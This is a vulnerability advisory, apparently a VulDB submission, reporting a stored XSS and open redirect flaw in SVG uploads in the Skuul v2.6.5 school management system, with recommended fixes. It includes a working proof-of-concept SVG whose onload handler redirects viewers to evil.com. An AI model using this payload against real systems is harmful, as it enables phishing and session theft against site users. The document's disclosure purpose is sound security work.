Submission #689012: yungifez Skuul v2.6.5 Open Redirect Information

Title: yungifez Skuul v2.6.5 Open Redirect
Description: Skuul version 2.6.5 allows the upload of unsanitized SVG files in the Edit School section. Since the application serves uploaded SVGs directly without sanitization or content-type enforcement, attackers can embed JavaScript or redirection payloads inside SVGs. When a user or administrator opens the uploaded image in a new tab, the browser executes the embedded script, resulting in a stored cross-site scripting (XSS) or open redirect attack.

Steps to Reproduce:
1. Log in to Skuul at http://127.0.0.1:8000/login as Admin.
2. Navigate to: http://sk.htb:8000/dashboard/schools/1/edit
3. Upload an SVG file with the following content:

    <?xml version="1.0" standalone="yes"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="window.location='https://evil.com/'">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    </svg>

4. Any user (Super Admin, Student, Teacher or Parent) opens the image in a new tab.
5. The browser automatically redirects to https://evil.com/.

Impact:
-) Automatic redirection to attacker-controlled websites (phishing/malware risk).
-) Stored XSS possibility through malicious SVG payloads.
-) User credential theft or session hijacking if same-origin.
-) High impact if an admin account is compromised, affecting all users.
-) Loss of user trust and potential reputational damage to the platform.

Recommendation:
-) Disallow SVG uploads entirely, or
-) Sanitize SVGs using libraries like DOMPurify, sanitize-svg, or similar before storage.
-) Serve SVGs with the Content-Type: image/svg+xml header and force download where possible.
-) Store and serve only rasterized versions (e.g., PNG/JPEG).

Affected Version: Skuul v2.6.5

Product Source:
-) Website: https://yungifez.github.io/skuul.org/
-) GitHub Repository: https://github.com/yungifez/skuul

Credits: Zeeshan Khan https://www.thezeeshankhan.site/
Source: https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff
User: Zeeshan Khan (UID 91384)
Submitted: November 4, 2025 17:57 (8 months ago)
Moderation: November 29, 2025 13:59 (25 days later)
Status: Accepted
VulDB Entry: 333788 [yungifez Skuul School Management System up to 2.6.5 SVG File edit cross site scripting]
Points: 20
